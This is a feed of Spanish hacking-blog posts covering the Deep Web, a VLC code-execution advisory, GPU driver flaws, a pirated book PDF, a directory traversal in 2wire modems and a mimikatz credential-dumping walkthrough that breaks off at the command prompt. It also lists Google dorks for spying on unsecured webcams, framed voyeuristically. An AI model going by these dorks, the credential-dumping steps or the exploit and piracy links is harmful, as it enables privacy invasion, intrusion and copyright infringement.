Quantcast
Channel: hackplayers
Viewing all 1660 articles
Browse latest View live

La Web Oculta: Alguna vez pensaste por qué navegamos la web y no… nos sumergimos en ella?

$
0
0
Buenos protervos días/noches: “He venido hasta este blog de seguridad para tentarlos a todos, léanme bien porque yo soy su auténtico ‘Demontre Digital’. A qué forbidden site quieren ir??, yo los puedo llevar!! Me sobran proxy chains para el Deep Internet cruzar...me los llevaré a bailar el tango del placer, verán que no es lo mismo delirar que proceder…les toca decidir qué website quieren probar, mis tentaciones no son malas si las saben degustar….Háganme sentir bien: pórtense mal, conéctense a mi Darknet, sean mi pecado mortal. Ven qué fácil es mi diabólico amparo hallar?? Con permiso señor firewall lo voy a bypassear!!! Récenme queridos, cómprenme mi altar, porque en sus próximas cien vidas no se me van a zafar!! Será inútil expulsar a este demonio de ustedes, soy inmune al antivirus y no me iré sin infectar sus redes!! Yo soy aquel que explora en su navegador, soy Caín y soy Abel en su servidor.

Demontre Digital: qué espantosa compañía!! Déjenme troyanizarles el alma, para saber que sólo es mía…”   Oración para implorarle al Diablo Digital (o sea al redactor de este post) (A la oración se anexan 100 bitcoins y maldiciones de procedencia dudosa y no especificada).

**Espero que en algún momento de su vida hayan visto Matrix, en las siguientes líneas ustedes tendrán el papel de Neo y yo el de Morfeo, va? Ok…

Diablo Digital: Esta es su última oportunidad y su única. Después de esto no hay marcha atrás, pueden elegir cerrar la pestaña del navegador, la historia termina, continúan jugando Farmville en Facebook, y crean lo que quieran creer. Le dan click en Leer más, se quedan en el País de las Maravillas (bueno casi) y les enseñaré qué tan profundo es el agujero del conejo…

De acuerdo, si llegaron hasta esta línea quiere decir que clickearon en Leer más y no me mandaron como la perra Laika a la Luna. Gracias que lindos, los amo y me dan ganas de piropearlos. Ahora bien, el tema que en los siguientes párrafos pretendo desarrollar tiene connotaciones esotéricas profundas, muy enigmáticas, turbias como el agua del Lago de Chapultepec y a veces oscuras, como… la materia oscura =), altamente susceptibles de menguar y succionar la esencia vital del alma y de cualquier psique con defensas mentales enclenques. Les voy a hablar de algo que en principio a ustedes debe parecerles muy cotidiano, desde la perspectiva Internetera, pero que estoy seguro conforme avance el post, no van a tener una mórbida IDEA de verdad, a menos que como yo, se dediquen a curiosear por todos lados cual vieja chismosa. Mis queridos lectores, como en la famosa trilogía de Star Wars, surfeamos casi siempre en el lado luminoso de Internet, “but dark side of the force is a pathway to many abilites some consider to be unnatural”, pues bien damas y caballeros abróchense a sus santurrones: Quieren descubrir la Web "de cara fea" o quieren seguir en su burbuja rosa?? Mis queridos lectores les presento urbi et orbi el lado oscuro de Internet mejor conocido por sus visitantes como: Deep Web/DarkNet , (apuesto que más de uno se acordó de Deep Throat, no se hagan que tienen querubines en la cabeza).

Ok mis valedores, comencemos el show, primero, lo primero.

El alter ego, el segundo yo, ese misterioso personaje asociado a lo maligno, lo recóndito, lo inexplorado, lleno de los instintos más viles, bajos y cavernosos, capaz de seducir por igual a dioses y mortales. Se cree que éste es distinto de la personalidad original de la persona pero vive aprisionado dentro de ella. Uno de los ejemplos más celebres de este tema, es la novela de Stevenson “El extraño caso del Dr. Jekyll y Mr. Hyde”, donde el argumento principal se refiere a que el bien y el mal existen dentro de una persona, constantemente en conflicto, y en el que el alter ego trata de vencer la existencia del yo original.

Coloquemos el tema del ‘otro yo’ en el contexto de Internet. Quizá puedan empezar a imaginarse algunas cosas y si no es así, les pongo a rodar el cheto (a pensar para los puritanos) de manera rápida: la mayoría de los cibernautas navegamos con otra o múltiples personalidades bajo los niveles de supervivencia que nos plantea la red de redes. Justamente, el álter ego también se utiliza para referirse a los diferentes comportamientos de una persona que pueden aparecer ante ciertas situaciones. Algunos términos relacionados con la Web incluyen el avatar, el doppelgänger, el imitador y los nicknames. Claramente el concepto lo vemos mucho más reflejado en las redes sociales, cuando editamos nuestro perfil como se nos antoja, le subimos fotitos, le ponemos un monito o un emoticon, y le mostramos al mundo lo que nos apasiona y nos gusta.

 Dios mío del Génesis…Si un día nos atacan las plagas de Jehová ni pregunten por qué.
 Creo que esa frase de “Antes de criticarme…” era famosa entre los individuos que traían peinados a la perro ovejero, cómo se llamaban, a si emos (una tribu urbana, medio depresivos los amigos).

Como bien sabemos la interacción en la Web, es indirecta, completamente aislada del contacto físico y limitada en muchos casos por el contacto visual y hasta en tiempo real. Francamente permite que las personas “finjamos” ser y comportarnos de otra forma a la que somos en la realidad, y es así como en el mundo digital nos distinguimos comúnmente con otra personalidad (o quién sabe eh, a lo mejor aquí en la Web es dónde mostramos nuestro verdadero genio, sacamos las uñas y el cobre, yo por lo menos me vuelvo más intelectualoide que de costumbre, y encubro mi índole guarra, chaca, y malviviente [guarro: hombre grosero y sin modales, chaca: pandillero sin escrúpulos {que vendría siendo casi lo mismo que guarro}, malviviente: malviviente {que vendría siendo casi lo mismo que chaca y guarro}]).

Sin embargo, para aquellos que realmente necesitan ocultar mucho más que su propia personalidad, o sus fetiches, existe esa otra Web, la cual para empezar no está al alcance de la indexación de Google. Es algo así como el alter ego de Internet, su lado clandestino y underground, en el que se encuentran sitios, cosas y personas que no podríamos encontrar "tan fácilmente" en la red visible. Increíblemente y por extraño que parezca, esta red, a la que casi nadie accede contiene el 80% aproximado del contenido de todo Internet. 20% lo conoce el mundo de arriba, un porcentaje irrisorio que esconde más de lo que muestra. Por supuesto para saber de ella, podemos preguntarle como todas las dudas universales a Google, pero si queremos adentrarnos en sus aposentos, hay que hacer unas cuantas invocaciones…

Entrando en el andén 9 ¾,

***MUY IMPORTANTE: Mientras no tengan una buena idea y estén muy seguros de sus implicaciones al navegar, aléjense de la Deep Web. Las “cosas” que se encuentran ahí, no son como las cosas que aparecen en la Web “Normal”. Primero que nada los virus/gusanos que pueden adquirir son más sofisticados y pueden explotar las vulnerabilidades de su máquina, su información, su identidad de manera más peligrosa y sin que se den cuenta.  Además, ahí pueden tener contacto inmediato con individuos y organizaciones de origen no muy prestigiado y una buena parte de los sitios que existen contienen temáticas fuertes y resultan bastante perturbadoras para el público. Les pido precaución.

La Deep Web se llama así simplemente porque no es accesible por medio de la navegación tradicional, utilizando los motores de búsqueda como Google. Ya se podrán imaginar quién se inventó a este Frankenstein, exacto!! la US Army. Y bueno, cómo es que funciona su ocultabilidad? Grosso Modo y sin meterme al detalle técnico: Utiliza el concepto de cebolla, (Onion network) que permite cifrar la información que se transmite entre dos puntas A y B , además añade que lo que se transmite viaja aleatoriamente por varios nodos antes de llegar a A o a B. Entonces algún chismoso (como yo) que quiera ponerse en medio del canal, no va a saber ni de dónde procede la información, ni su contenido por sus múltiples capas de cebolla que tiene encriptadas, antes de llegar a la información en claro. Si tenemos un sitio privado y protegido, por medio de la Deep Web se mantendrá escondido, invisible, en la profundidad a la que raramente van a acceder. Dichos sitios invisibles tienen una dirección del tipo ‘onion’, que es una combinación rara de caracteres. Esta es la dirección de un sitio onion activo: 3suaolltfj2xjksb.onion. Pongan esa dirección en su navegador y no les va a jalar…a menos que utilicen ciertos mecanismos de navegación. Para los que no saben mucho cómo funciona el Internet, believe me cuando les digo que si el sitio está invisible, es muy difícil de llegar a él.

Es como si trataran de visitar la casa de alguien sin saber ni siquiera en qué país vive. Les repito hay formas de ir y seguirán sin saber dónde está la casa pero al menos podrán visitarla.

 
Aguantemos la respiración.

Bueno y de cuánto nos estamos perdiendo?? Haciendo un cálculo mental sencillo utilizando mi algoritmo propietario estocástico y pseudolaeatorio, y extrapolando los números de una manera integral, diría que de un chorro y dos montones de información. Más o menos unos 7500 terabytes con 550 billones de documentos, comparados con los 19 terabytes y 1 billón de documentos de la Surface Web.

En cuanto a contenido, la Deep Web está compuesta por todo tipo de cosas, que al ser tanta y tan variada como la Web que vemos, la categorización se vuelve obligatoria. Significa que podrás encontrar la puerta a bases de datos (concepto importante en la Deep Web) con directorios gigantescos de información sobre lo que ustedes ni se imaginan: historia, política, sociales, astronomía o cualquiera de las principales áreas en las que los gobiernos metan sus narices, bibliotecas de millones de tomos, diccionarios, sitios de noticias anónimos, datos financieros, hemerotecas, sitios de organizaciones y empresas, publicaciones de libros, directorios con información de personas y sus correos electrónicos o números telefónicos, informes como los de Wikileaks, blogs de agrupaciones anónimas, comentarios de redes sociales indebidos (por ahí me encontré una versión de Twitter pero secreta), entre tantos otros contenidos que te estés sabroseando por tu mente. Con respecto a lo de Wikileaks, vale la pena mencionar que lo “novedoso” mostrado en la tele y periódicos sobre la CIA, el gobierno de EU, etc. en la Deep Web ya llevaba unos cuantos añitos de añejamiento. Hasta aquí el significado de DarkWeb es meramente utilizado porque estamos hablando de oscuridad en el sentido estricto de que se esconde a la vista de los espectadores comunes.

Luego de leer lo anterior, seguramente te has quedado pensando en que falta tal vez lo más impactante de todo, lo que queda fuera de lo reglamentario, y en este aspecto la ilegalidad y lo prohibido toman un papel preponderante en las intenciones del aprovechamiento de la Deep Web. Exactamente de qué les estoy hablando?? Ok, les pondré una imagen que les da una probadita de lo que ahí existe. Pero antes, (onomatopeya) (se preguntará el sagaz lector) quién rayos va a preferir incurrir en sitios de esa calaña?? Quién tiene la cabeza llena de morbosidad para poder investigar cosas tan deleznables?? Nadie en sus 5 sentidos salvo que tenga pacto con el chamuco…bueno y yo (contesta el autoproclamado demontre). La verdad es que si hay un tipo o varios tipos de personas que deberían considerar usar o que ya usan esta red. Cuáles son esas personas? Enumeremos:

1) Personas que quieren acceder a sitios de información y están monitoreadas por una organización o un gobierno. 2) Personas que quieren publicar su opinión en blogs y están censuradas y son reprimidas. 3) Personas que quieren denunciar abusos de forma anónima. 4) Personas que desean incurrir en actividades ilegales de forma anónima. 5) Personas que simplemente desean navegar de forma segura y anónima y sentir la máxima expresión de la libre expresión jajaja! 6) Personas que desean ayudar a otras en países con censuras de la red a acceder a sitios de información o a publicar noticias y opiniones. 7) O simplemente los tipos que desean saber qué es lo que hay debajo de nosotros!!

 
Igual que en el infierno de Dante, mientras más círculos recorran hacia el Cocytos la cosa se va poniendo más peliaguda…

***Antes de continuar me gustaría explicar lo más breve posible la imagen anterior: Entre más nos adentremos en la Deep Web vamos a encontrar cosas medio escalofriantes, como bien se pueden dar cuenta en el pic. Lo interesante de esto es el mecanismo que debes usar “after this point”. Proxies, Tor, Closed Shells son elementos de ofuscación y enmascaramiento que te permiten navegar por la Deep Web, con mayor versatilidad…digamos. Así es, estos son ejemplos de medios para poder viajar al lado oscuro. (Btw, lo del cómputo cuántico si está para fumarnos un porrote y quedar bien duendes por unas horas, no se lo crean tanto).

En la Deep Web se pueden encontrar muy muy fácilmente sitios donde a cierto tipo de gentuza le fascina enchuecar el mundo a su grata medida. Aquí encontramos la clase de horrores secretamente pérfidos que se ríen dos veces al mismo tiempo de lo lícito: una por lo que muestran y la otra por cómo lo esconden, no hace falta listar el tremebundo etcétera de los lugares peligrosamente permisibles de la Deep Web en los que podemos irnos a dar la vuelta, toda actividad ilegal imaginable y todo a disposición de la gente por unos cuantos BITCOINS (moneda oficial del Deep Web, que también ahí puedes cambiar por tu dinero real).

Además, estarás expuesto a todo tipo de amenazas cibernéticas hechas por verdaderos profesionales. Y eso también créanmelo. Siempre que pintan a los hackers (algunos no todos) de la Internet surfeable, los describen malísimos, geniudos, capaces de cualquier atrocidad, y unos vándalos consumados. Pero comparados con los que viven en la Deep Web, esos no son hackers, son cariñositos. Los de la Darknet son unos hijos de la Mother Monster, hechos y pulidos a mano. Nuevamente, muy atentos a la hora de navegar por esas aguas.

“Trolls use the Internet. Ogres uses Deep Web.”

Lamentablemente a pesar de que el FBI, la Interpol y hasta Benedicto XVI estén a la caza de los sujetos que suben o intercambian contenido ilegal en la Deep Web, es inútil e intratable borrar y dar de baja esos sitios. Para empezar son muchérrimos, y después…de nada sirve denunciar. Las páginas al estar en formatos que muchas veces ni siquiera son direccionales, vaya a veces ni siquiera son formato html (el formato que lee todo navegador para entrar en Internet) al ingresarlas a la páginas de policía cibernética, tristemente no aceptan la entrada, porque son maso menos así cewnisdds0939d33edfdewfr.onion/defnifdnvf/dkewfrgn. Se han realizado algunos esfuerzos por tratar de mitigarlos pero casi nada es muy efectivo. Al parecer sólo hackers pueden desactivar estos sitios. Mmmmm…

Bueno y ya por fin…cómo le hacemos para acceder a la Deep Web?? Pues no les voy a decir...XD, ya les di demasiadas pistas en este post. Mis lectores más geeks, lo sabrán hacer y para los que no, mejor que investiguen bien antes de aventarse al estanque de cocodrilos.

En fin, después de haberles contado lo que hay en la Deep Web y haber violado sus inmaculados ojos, opino que esa frase de `no debería haberles dicho´ lo dicen solamente los orates. La Deep Web siempre te llega al morbo. Lo que no te alcanza a saciar con la Hidden Wiki, te lo da con sus blogs, su información clasificada y sus millones de páginas. Qué virusito buscabas? La Darknet te lo regala. En la Deep Web puedes ser el alter ego y la porquería que tú gustes. En la Deep Web se comen heces a la carta. Claro que, una cosa es que te comas la pupú que te dan, y otra cosa muy diferente es que les ruegues para que te sirvan el segundo plato. Si vas a links con el contenido horroroso previamente citado, pues eso ya depende de ti estimado lector. Personalmente creo que es un tema que da horas y horas de diversión y sobretodo de qué hablar en la cena de Navidad y Año Nuevo, y del cual las personas se pueden enterar siempre y cuando utilicen el intelecto.

Internet y la Deep Web son una fuente ilimitada de buena información. Disfrútenla, sépanla buscar pero con cuidado; las profundidades, como en cualquier aspecto de la vida, no son para cualquiera.

Weeenooo…a estas alturas creo que ya tienen una idea de la clase de alimaña que se están contrayendo cada vez que me leen. No no señoritos, meterme a mí en Internet es casi igual a meter alcohol en una estudiantina. La curiosidad por el gusto de la curiosidad, y el placer enfermizo de saber de todo, son atributos laborales de un ‘Demontre Digital’. Me despido no sin antes dejarles un link, para que vean la main page del Hidden Wiki. No más un pequeño quemón. Le pueden dar click, sin temor a infectarse de alguna ETS, es una imagen nada más. No me los estoy llevando al averno sin señalización.

(También les comparto una entrada previamente publicada en este mismo sitio por su administrador que nos habla justamente de la Web Oculta, y sus sitios oscuros) 

Happy Hacking =)

PD.- Se me olvidó en el post pasado poner Happy Hacking =). Con razón estaba a punto de sufrir muerte de cuna la otra noche.
  
***Anexo. Para que todos entendamos la Oración del Demontre Digital. Aquí van los conceptos en cursiva:
Forbidden Site: Sitio prohibido en la Web por varias razones. Falta de credenciales, falta de atributos en la navegación. Falta de ganas de meterse a la fuerza.
Proxy Chain: Cadena de proxies es un mecanismo que nos ayuda a mantener anonimidad en la red.
Deep Internet/Website/Darknet/redes/explorar en el navegador: Ya ya quedó claro no? Firewall: Es un dispositivo que entre otras cosas nos ayuda a controlar las conexiones hacia un sitio determinado. Nos protege en cierto sentido de que nos conectemos a cosas indebidas. Bypass: En el contexto de bypassear el firewall quiero decir. “Saltarnos el control que nos brinda el firewall y conectarnos a ver videos en Youtube”.
Antivirus: Por favor no me hagan definirles esto.
Servidor: Pues aquí es un concepto muy variado. Imaginen una laptop con memoria más grande y todo más grande para meter mucha info, justo como sitios Web.
Bitcoins: Dinero de Internet.
Troyanizar: Igual que en la Ilíada, meterles un caballo para invadirles Troya.

Ejecución de código remoto en VLC Media Player

$
0
0
Uff! tras unos días en el limbo de lo absurdo os saludo lectores de hackplayers!!!. Ando un poco liado esquivando como puedo las estocadas del quinto jinete de la Apocalipsis...esta maldita crisis, la cual lleva unos cuantos años marchándose... pero seguimos teniéndola soplándonos a todos (o casi todos) detrás de la oreja, esperando un descuido para acabar de todas con la esperanza de curro, casa, jardín, perro...

Bueno, estaba yo en casa después de una jornada de trabajo, en el cual no sé si será por las fechas o porque donde tendríamos que estar nueve estamos seis, no me acabo de ver el culo. Cuando me ha llegado el humo de una noticia que me ha dejado algo intranquilo... 

Gracias a los chicos de Hispasec (los cuales han cambiado la estética de su página web... echarle un ojo... es un consejo a todos) os adjunto una noticia que cito textualmente:

"Se ha publicado una vulnerabilidad en el reproductor multimedia VLC Media Player que podría permitir la ejecución de código de forma remota.
VLC Media Player es un reproductor multimedia de código abierto desarrollado por VideoLAN Proyect. Soporta múltiples formatos como MP3,MPEG, DIVX, VCD, DVD o Flash y está disponible para diversas plataformasy sistemas operativos.

Kaveh Ghaemmaghami ha descubierto un error en el reproductor VLC al procesar ficheros Flash. Se debe a un error de desbordamiento de búfer al acceder a un objeto de imagen en memoria ya eliminado, durante la decodificación de vídeo en formato Flash. Esto provocaría una referencia a memoria ya liberada que podría ser utilizada para causar una denegación de servicio y, potencialmente, ejecutar código arbitrario.

El error ha sido comprobado en la última versión disponible del reproductor, la 2.0.4, aunque otras versiones también podrían ser vulnerables. Por el momento no existe una solución oficial y tampoco se ha asignado ningún identificador CVE a esta vulnerabilidad."
  
Os adjunto la dirección de descarga de la prueba de concepto por si queréis probar el error http://www39.zippyshare.com/v/91522221/file.html.

El fabricante VideoLAN ya ha publicado un parche para solucionar esta vulnerabilidad, así que os recomendamos aplicarlo si utilizáis este reproductor para ver los vídeos de felicitación de navidad... Ho ho ho!

Referencias:
http://packetstorm.tacticalflex.com/1212-advisories/vlcmediaplayer204-overflow.txt
http://seclists.org/fulldisclosure/2012/Dec/96
http://trac.videolan.org/vlc/ticket/7860
http://www.exploit-db.com/exploits/23201/


Vulnerabilidades en controladores gráficos de AMD y NVIDIA

$
0
0
El malware siempre o casi siempre se desarrolla para afectar y propagarse en el mayor número de equipos posible, simple economía de escala. Explotar vulnerabilidades en los controladores de los dos mayores fabricantes de tarjetas gráficas, AMD y NVIDIA, es cuanto menos una buena idea para mentes cabales y malvadas.

Hace algo más de una semana, AMD alertaba de un fallo de seguridad en la funcionalidad de actualización automática de su centro de control Catalyst. El propio fabricante instaba a sus usuarios a desactivar la opción “Comprobar automáticamente actualizaciones” y a no recibir avisos de nuevos drivers, al menos hasta principios del 2013. Así que toca actualizar los drivers directamente desde el sitio web amd.com.

Si por el contrario utilizas NVIDIA pues la situación no es tampoco demasiado alentadora. Un tal Peter Winter-Smith (Pedro para los amigos) acaba de publicar otro exploit para un fallo en NVIDIA Display Device server (NVVSVC), el servicio de los drivers de pantalla de Windows, que podría permitir a un usuario local o remoto obtener privilegios de administrador mediante un desbordamiento de pila. Ya se avisó de un fallo similar en los drivers de Linux en agosto que permitía también escalar privilegios...

En conclusión, tened en cuenta estos vectores de ataque y a punto vuestros sistemas fortificados (firewalls locales, permisos, etc.). Que no os coja desprevenidos el año 2013 ;)

Libro: Hacker Épico en pdf

$
0
0
Desde que recibí el libro Hacker Épico opté por paladearlo sólo durante los viajes diarios en tren hacia el trabajo, para hacerlos más amenos y cortos. Tanto es así que durante el segundo día de lectura me pasé dos paradas y ahora maldigo el momento en el que el tren llega puntual, o no sufre ningún percance, huelga,  incidencia o retraso porque es verdad que la trama te atrapa y no quieres parar de seguir leyendo. Es como cuando te enciendes un cigarro y justo viene el autobús, apenas das dos caladas y tienes que apagarlo...

De momento el principio promete, un libro en el que convergen una novela de intriga y un manual técnico como un Martini seco con vodka, agitado, no removido. Todo ello con el encanto de aquel que reconoce un entorno muy cercano, con una narrativa con múltiples guiños a una realidad que muchas veces supera la ficción, en el que cada investigación, prueba o reflexión del protagonista es una lección aprendida o por aprender, algunas sublimes. Es decir, una obra lúdico-didáctica como nunca había leído en castellano.

El caso es que un buen amigo está muy ilusionado con tener el libro, más el mío que es uno de los que vienen con una pequeña dedicatoria de Alex y Rodrigo, no personalizada pero al fin al cabo dedicatoria. No sé si es por la navidad que ablanda fríos y duros corazones, pero decidí envolverlo para regalo y enviárselo... y como podéis imaginar, tampoco iba a quedarme sin terminar una lectura que ya me tenía enganchado, así que he escaneado pacientemente cada una de sus páginas y convertido el libro de papel en un libro electrónico en pdf.

De esa forma puedo seguir leyendo el libro en mi móvil, salvo un árbol, hago un regalo genial a un amigo y, continuando con el frenesí en mi derroche de generosidad, también os comparto el pdf. Al fin y al cabo estamos en navidad, así que a disfrutarlo:

http://depositfiles.com/files/iqejkvjls

UbnHD2 : un distribución de pentesting para móviles

$
0
0
Muchos de vosotros seguro que habéis pensado en convertir vuestro smartphone Android en un auténtica máquina de hacking. Algunos seguro que habéis instalado aplicaciones como ANTI, dSploit, FaceNiff, etc. y puede que incluso algún osado haya instalado la versión ARM de Metasploit.

Hoy vamos a ver otra solución para este propósito: UbnHD2, un SO basado en Ubuntu para pentesting que se ejecuta de forma nativa en un dispositivo HTC HD2. La distribución de momento está en fase beta y todavía hay algunas opciones que no funcionan. Puedes encontrar los pasos necesarios para la instalación en la página del desarrollador.

 

Características:

- Basado en Ubuntu 10.10 Maverick Meerkat, Kernel 2.6.32.15 (ARM)
- X.org 7.5, GNOME 2.32.0 & Cairo-Dock 2.2.0
- USB-OTG, 3G Network & WiFi (drivers no incluidos, proprietarios, cosulta el foro XDA)
- Perl 5.10.1, Ruby 4.5, Python 2.6.6 y más de 170 herramientas de Pentest precargadas

Descarga desde Sourceforge

Fuente: UbnHD2 : The Hacker News

Lo más visto del 2012 en Hackplayers

$
0
0
En esta ocasión finalizamos también el año con un post con las 50 entradas de Hackplayers más vistas durante el 2012, según Google Analytics.

Como siempre, daros las gracias por leernos y participar con vuestros comentarios, soluciones a los retos y colaboraciones. No dudéis en contactar con nosotros si estáis interesados en algún tema en particular o si queréis participar con vuestro artículo. Nos vemos en el 2013. ¡Feliz y próspero año nuevo!
  1. hackplayers: Blogroll en español
  2. Sexting y hoax sobre alumnos de Deusto
  3. LOIC: la herramienta DDoS utilizada por Anonymous
  4. Caras "cachondas" en el chat de Facebook
  5. Whatsapp: cómo enviar una imagen con una vista previa falsa
  6. Reaver-wps: ataques de fuerza bruta contra WPS
  7. Tutoriales de Backtrack 5
  8. WhatsAppSniffer: captura fácilmente conversaciones de WhatsApp
  9. hackplayers: English Blogroll
  10. La 9ª de Anonymous compromete los sitios web de Capio Sanidad
  11. Taller de lock picking #3: Herramientas de ganzuado
  12. Recopilatorio de recursos de análisis de malware de Claus Valca
  13. Taller de lock picking #2: Técnicas de apertura
  14. WiFite: crackear redes wifi para dummies
  15. hackplayers: Retos de Hackplayers
  16. 50 tutoriales para el administrador de sistemas de Unix/Linux
  17. Taller de lock picking #1: Iniciación
  18. Reto 10: averigua el patrón de desbloqueo
  19. Primeros exploits de día 0 para Windows 8
  20. Nmap: de escaneador de puertos a escaneador de vulnerabilidades
  21. Sumergiéndonos en la Internet profunda
  22. La venganza de Anonymous (caso Amanda Todd)
  23. Puerta trasera oculta en Windows
  24. ¡Disponible BackTrack 5 R3!
  25. Ocultando el backdoor PHP Weevely en los metadatos de un JPG
  26. Vulnerabilidad en Skype permite obtener la IP de cualquier usuario
  27. Backdoors web en imágenes: mejorando la técnica
  28. Un paso más allá del Antivirus. Sandboxie
  29. Convierte tu Firefox en un keylogger invisible
  30. De cómo colarse en el metro de forma elegante... (NFC hack)
  31. Crackea redes wifi con tu Android (en modo monitor)
  32. Cómo eludir la autenticación de Microsoft SQL Server en un servidor ya comprometido (post-explotación)
  33. El viejo truco de las sticky keys sigue funcionado
  34. Evasión del límite de 140 caracteres de Twitter mediante codificación CESU-8
  35. Votación para las mejores técnicas de hacking web del 2011
  36. Santoku: distribución de seguridad para dispositivos móviles
  37. Las 10 mejores técnicas de hacking web en el 2010
  38. Secuestro de sesiones mediante DroidSheep
  39. Cómo abrir un candado probando menos de 100 combinaciones
  40. Escaneando con nmap a través de Tor
  41. DarkComet RAT llega a su fin
  42. ¿Cuál es el mejor firewall de red?
  43. Solución al reto 3 del GP de Bahrein
  44. Metasploit Autopwn
  45. CRIME: el nuevo ataque a SSL/TLS sucesor de BEAST
  46. Anti: el pentesting sencillo desde Android
  47. De 0x90 a 0x4c454554, un viaje dentro de la explotación
  48. Libro: La biblia del Hacker 2009
  49. Explota inyecciones SQL fácilmente con Havij
  50. hackplayers: Seguimiento de Twitters

Directory Traversal en módems 2wire 4011G y 5012NV

$
0
0
Recientemente acabo de leer una entrada en la Comunidad Underground de México en la que avisan de una interesante vulnerabilidad de directory traversal en los módems 2wire 4011G y 5012NV, unos de los más populares del país distribuidos por Telmex y otros ISPs y cuyos modelos anteriores ya adolecieron de algunas otras vulnerabilidades importantes como CSRF y DoS.

La vulnerabilidad de la que hablamos ahora fue descubierta por Abraham Díaz en septiembre de 2012 que, tras intentar avisar al fabricante y al ISP y después de no recibir respuesta, decidió publicarla el 31 de diciembre.

El problema está en el formulario de inicio de sesión del portal de configuración por http de estos módems, específicamente en el control oculto llamado __ENH_ERROR_REDIRECT_PATH__ que no es validado correctamente en el servidor. Un atacante sin autenticación puede manipular su valor para obtener del dispositivo archivos con contraseñas de fábrica en texto plano, configuraciones, etc.


Los dispositivos afectados son:
2wire 4011G-001 con firmware <= 9.1.1.16
2wire 5012NV-002 con firmware <= 9.3.1.29
Posiblemente otros con firmware 9.x.x.x
 

 
El autor también facilita un script para nmap (http-2wire-dtvuln.zip) que ayuda a identificar al objetivo e intenta obtener varios archivos:
 

Algunos google dorks para espiar cámaras web en Internet

$
0
0
El otro día afinando una búsqueda y al comenzar a teclear 'inurl' Google autocompletó 'inurl view index shtml baños'... vamos uno de los clásicos dorks para buscar cámaras web y ya de paso, y por qué no, que sea en unos baños...  "Tienes alguna de algún cambiador de ropa de zara o de algún baño femenino?"


XD.. pero... ¡desde cuando se instalan cámaras en baños o cambiadores de tiendas de ropa!. Lo cierto es que si juntamos el innato voyeurismo humano con el deseo inherente de encontrarnos alguna escena tipo Porky's, miles de cámaras en Internet nos brindan la posibilidad de asomarnos por ese agujerito indiscreto. 
 

Ya sea por fallos en el software de las cámaras o por carencias en la configuración, es tan sencillo acceder a ellas como introducir unas simples búsquedas en San Google (no tan santo a veces):

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh

* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”
* inurl :indexFrame.shtml "Axis Video Server"
* "MOBOTIX M1" and "open menu"
* intitle :flexwatch intext :"Copyright by Seyeon TECH Co"
* “my webcamXP server!”

Por último decir que también existen páginas web que nos "mapean" estas puertas hacia la curiosidad, algunas abiertas, como World in cams o Fisgonia, e incluso hace poco el Maligno creó una cuenta en Twitter para seguir en tiempo real el descubrimiento de nuevas cámaras TrendNet vulnerables... :-O

La base de datos de hackers más grande en Internet

$
0
0
Infosec Institute ha añadido a su comunidad SOLDIERX la base de datos de hackers más grande publicada en Internet de la que incluso dicen rivaliza con la del FBI:

"La SOLDIERX HDB es la mayor base de datos pública de hackers en la red y se rumorea que es sólo comparable con la base de datos de hackers del FBI. Su base de datos de hackers contiene una lista de programadores, desarrolladores, sombreros negros, sombreros blancos, investigadores de seguridad, falsos hackers éticos, hacktivistas, packet kiddies, click kiddies, script kiddies, profesionales de seguridad, héroes de la revolución informática (hola Steven Levy), los hackers de hardware, ch1xors (oh sí! aunque algunas personas creen que son inexistentes), los hackers de videojuegos y aquellos que han aceptado e incorporado la cultura hacker ....."

La mayoría de las entradas en la HDB (aunque no todas) puede considerarse hackers, de acuerdo a Steven Levy (editor de Wired) y a la descripción de la ética hacker y sus principios:

- Acceso a ordenadores (y a cualquier cosa que pueda enseñarte algo acerca de la forma en que funciona el mundo) debería ser ilimitado y total.
- Toda la información debe ser libre.
- Desconfianza en la autoridad, promover la descentralización.
- Los hackers deben ser juzgados por hacking, no por falsos criterios tales como títulos, edad, raza o posición.
- Tú puedes crear arte y belleza en un ordenador.
- Los ordenadores pueden cambiar tu vida para mejor.

Personalmente hecho en falta a muchísima gente en esa base de datos, muchos de ellos y claro está del panorama nacional. Por supuesto pienso también que en esa lista habrá siempre grandes olvidados ya que muchos de los grandes hackers son anónimos y seguirán siéndolo. No obstante, actualmente incluye 750 nombres/nicks por lo que es sin duda un gran "bestiario", ¿no crees? ;):
http://www.soldierx.com/hdb

Obteniendo con mimikatz las contraseñas en texto plano de las tareas programadas y del administrador de credenciales de Windows

$
0
0
Si recordáis, a principios del año pasado vimos lo fácil que era recuperar contraseñas en claro mediante la herramienta mimikatz. Resumiendo un poco, si se disponen de permisos de debug sobre el proceso del LSASS, esta herramienta inyecta una librería y obtiene la contraseñas en claro de dos proveedores de autenticación por defecto (Tspkg y Wdigest) que almacenan las credenciales de los usuarios de forma reversible.

Ahora su autor, el francés Gentil Kiwi, implementa y nos demuestra como obtener también las contraseñas en claro de las tareas programadas y del administrador de credenciales de Windows (contraseñas almacenadas de acceso a recursos compartidos, unidades de red, escritorios remotos, etc.). 

Vamos a probarlo y para ello empezaremos creando una tarea programada de prueba con un usuario local del equipo:


Ahora ejecutaremos mimikatz como SYSTEM y probaremos el módulo 'divers::secrets':

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>d:

D:\>cd mimikatz_trunk\x64

D:\mimikatz_trunk\x64>mimikatz.exe
